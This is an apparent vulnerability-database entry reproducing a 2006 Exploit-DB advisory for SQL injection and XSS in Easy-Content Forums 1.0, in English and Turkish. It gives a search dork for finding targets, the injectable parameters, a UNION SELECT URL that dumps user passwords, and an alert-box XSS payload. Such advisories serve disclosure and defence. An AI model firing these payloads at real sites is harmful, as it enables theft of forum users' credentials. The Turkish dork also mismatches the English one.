Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

vendor:

Easy-Content Forums

by:

ajann

8.8

CVSS

HIGH

SQL/XSS

89, 79

CWE

Product Name: Easy-Content Forums

Affected Version From: 1

Affected Version To: 1

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2004

Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

Easy-Content Forums 1.0 is vulnerable to multiple SQL and XSS injection attacks. The userview.asp and topics.asp files are vulnerable to SQL injection due to lack of filtering. The userview.asp and topics.asp files are also vulnerable to XSS due to lack of filtering. An example of an XSS attack is http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E which will display an alert box with the letter X.

Mitigation:

Ensure that all user input is properly filtered and validated before being used in SQL queries or XSS attacks.

Source

Exploit-DB raw data:

ENGLISH
# Title  :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork   :   "Copyright 2004 easy-content forums"
# Author :   ajann
# Exploit;

SQL INJECT.ON--------------------------------------------------------
###  http://[target]/[path]/userview.asp?startletter=SQL TEXT
###  http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------
###  http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X




TURKISH
# Ba.l.k          :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama]   :   "powered by phpmydirectory"
# Aç... Bulan     :   ajann
# Aç.k bulunan dosyalar;

SQL INJECT.ON--------------------------------------------------------
###  http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
###  http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken

Örnek:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Örnek:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.

Ac.klama:
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.

# milw0rm.com [2006-05-26]